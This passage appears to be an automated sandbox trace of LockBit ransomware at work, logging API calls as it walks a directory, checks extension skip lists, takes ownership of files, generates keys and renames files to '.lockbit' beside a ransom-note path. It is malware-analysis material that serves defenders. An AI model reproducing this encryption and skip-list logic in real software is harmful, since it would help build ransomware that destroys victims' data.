hFile=0x3c4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0081.909] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-back-static.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-back-static.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0081.909] malloc (_Size=0xb8) returned 0x77d800 [0081.909] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xb8, FileInformationClass=0xa) returned 0x0 [0081.909] free (_Block=0x77d800) [0081.909] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-back-static.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories") returned 1 [0081.909] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Restore-My-Files.txt") returned 74 [0081.909] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0081.910] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7116fa23, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7116fa23, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d27ad27, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x280e, dwReserved0=0x0, dwReserved1=0x0, cFileName="btn-next-static.png", cAlternateFileName="")) returned 1 [0081.910] lstrcmpiW (lpString1=".", lpString2="btn-next-static.png") returned -1 [0081.910] lstrcmpiW (lpString1="..", lpString2="btn-next-static.png") returned -1 [0081.910] PathFindExtensionW (pszPath="btn-next-static.png") returned=".png" [0081.910] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0081.910] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0081.910] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0081.910] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0081.910] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0081.910] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0081.910] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0081.910] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0081.910] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0081.910] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0081.910] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0081.910] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0081.910] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0081.910] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0081.910] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0081.910] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0081.910] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0081.911] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0081.911] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0081.911] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0081.911] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0081.911] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0081.911] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0081.911] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0081.911] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0081.911] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0081.911] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0081.911] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0081.911] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0081.911] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0081.911] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0081.911] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0081.911] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0081.911] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0081.911] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0081.911] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0081.911] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0081.911] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0081.911] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0081.912] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0081.912] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0081.912] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0081.912] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0081.912] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0081.912] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0081.912] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0081.912] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0081.912] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="btn-next-static.png") returned 1 [0081.912] lstrcmpiW (lpString1="ntldr", lpString2="btn-next-static.png") returned 1 [0081.912] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="btn-next-static.png") returned 1 [0081.912] lstrcmpiW (lpString1="bootsect.bak", lpString2="btn-next-static.png") returned -1 [0081.912] lstrcmpiW (lpString1="autorun.inf", lpString2="btn-next-static.png") returned -1 [0081.912] lstrcmpiW (lpString1="thumbs.db", lpString2="btn-next-static.png") returned 1 [0081.912] lstrcmpiW (lpString1="iconcache.db", lpString2="btn-next-static.png") returned 1 [0081.912] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\") returned="" [0081.912] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-next-static.png") returned=".png" [0081.912] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0081.912] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0081.912] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0081.912] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0081.913] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0081.913] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0081.913] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0081.913] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0081.913] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0081.913] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0081.913] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0081.913] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0081.913] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0081.913] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0081.913] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0081.913] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0081.913] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0081.913] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0081.913] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0081.913] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0081.913] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0081.913] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0081.913] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0081.913] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0081.913] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0081.913] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0081.913] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0081.914] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0081.914] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-next-static.png.lockbit") returned 81 [0081.914] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-next-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\btn-next-static.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0081.914] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0081.914] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0081.915] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0081.915] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0081.915] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0081.915] RtlFreeAnsiString (AnsiString="\\") [0081.915] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3a0) returned 0x0 [0081.915] malloc (_Size=0x200) returned 0x77d800 [0081.915] NtQueryInformationToken (in: TokenHandle=0x3a0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0081.915] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0081.915] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0081.915] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-next-static.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0081.916] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-next-static.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0081.916] CloseHandle (hObject=0x3a0) returned 1 [0081.916] free (_Block=0x77d800) [0081.917] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-next-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\btn-next-static.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3a0 [0081.917] CreateIoCompletionPort (FileHandle=0x3a0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0081.917] malloc (_Size=0x40068) returned 0x3d70048 [0081.917] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=10254) returned 1 [0081.917] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.917] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.918] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0081.918] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.918] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.918] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0081.918] ReadFile (in: hFile=0x3a0, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0081.923] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-next-static.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-next-static.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0081.923] malloc (_Size=0xb8) returned 0x77d800 [0081.923] NtSetInformationFile (FileHandle=0x3a0, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xb8, FileInformationClass=0xa) returned 0x0 [0081.924] free (_Block=0x77d800) [0081.924] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-next-static.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories") returned 1 [0081.924] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Restore-My-Files.txt") returned 74 [0081.924] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0081.924] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x711bbcdd, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x711bbcdd, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d27ad27, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2808, dwReserved0=0x0, dwReserved1=0x0, cFileName="btn-previous-static.png", cAlternateFileName="")) returned 1 [0081.924] lstrcmpiW (lpString1=".", lpString2="btn-previous-static.png") returned -1 [0081.924] lstrcmpiW (lpString1="..", lpString2="btn-previous-static.png") returned -1 [0081.924] PathFindExtensionW (pszPath="btn-previous-static.png") returned=".png" [0081.924] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0081.924] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0081.924] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0081.924] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0081.924] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0081.924] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0081.925] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0081.925] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0081.925] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0081.925] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0081.925] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0081.925] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0081.925] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0081.925] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0081.925] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0081.925] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0081.925] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0081.925] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0081.925] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0081.925] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0081.925] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0081.925] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0081.925] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0081.925] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0081.925] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0081.925] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0081.925] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0081.925] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0081.925] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0081.926] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0081.926] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0081.926] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0081.926] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0081.926] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0081.926] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0081.926] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0081.926] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0081.926] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0081.926] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0081.926] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0081.926] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0081.926] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0081.926] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0081.926] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0081.926] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0081.926] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0081.926] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0081.926] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="btn-previous-static.png") returned 1 [0081.926] lstrcmpiW (lpString1="ntldr", lpString2="btn-previous-static.png") returned 1 [0081.926] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="btn-previous-static.png") returned 1 [0081.926] lstrcmpiW (lpString1="bootsect.bak", lpString2="btn-previous-static.png") returned -1 [0081.926] lstrcmpiW (lpString1="autorun.inf", lpString2="btn-previous-static.png") returned -1 [0081.927] lstrcmpiW (lpString1="thumbs.db", lpString2="btn-previous-static.png") returned 1 [0081.927] lstrcmpiW (lpString1="iconcache.db", lpString2="btn-previous-static.png") returned 1 [0081.927] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\") returned="" [0081.927] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-previous-static.png") returned=".png" [0081.927] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0081.927] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0081.927] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0081.927] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0081.927] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0081.927] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0081.927] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0081.927] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0081.927] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0081.927] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0081.927] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0081.927] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0081.927] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0081.927] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0081.927] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0081.927] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0081.927] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0081.927] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0081.927] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0081.928] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0081.928] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0081.928] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0081.928] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0081.928] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0081.928] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0081.928] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0081.928] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0081.928] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0081.928] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-previous-static.png.lockbit") returned 85 [0081.928] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-previous-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\btn-previous-static.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0081.934] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0081.934] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0081.934] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0081.934] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0081.935] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0081.935] RtlFreeAnsiString (AnsiString="\\") [0081.935] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c0) returned 0x0 [0081.935] malloc (_Size=0x200) returned 0x77d800 [0081.935] NtQueryInformationToken (in: TokenHandle=0x3c0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0081.935] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0081.935] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0081.935] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-previous-static.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0081.936] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-previous-static.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0081.936] CloseHandle (hObject=0x3c0) returned 1 [0081.936] free (_Block=0x77d800) [0081.936] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-previous-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\btn-previous-static.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c0 [0081.936] CreateIoCompletionPort (FileHandle=0x3c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0081.936] malloc (_Size=0x40068) returned 0x3df0008 [0081.936] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=10248) returned 1 [0081.936] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.937] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.937] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0081.937] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.938] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.938] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0081.938] ReadFile (in: hFile=0x3c0, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0081.941] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-previous-static.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-previous-static.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0081.941] malloc (_Size=0xc0) returned 0x77d800 [0081.941] NtSetInformationFile (FileHandle=0x3c0, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xc0, FileInformationClass=0xa) returned 0x0 [0081.942] free (_Block=0x77d800) [0081.942] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\btn-previous-static.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories") returned 1 [0081.942] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Restore-My-Files.txt") returned 74 [0081.942] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0081.942] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x711bbcdd, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x711bbcdd, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2a0e85, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x946, dwReserved0=0x0, 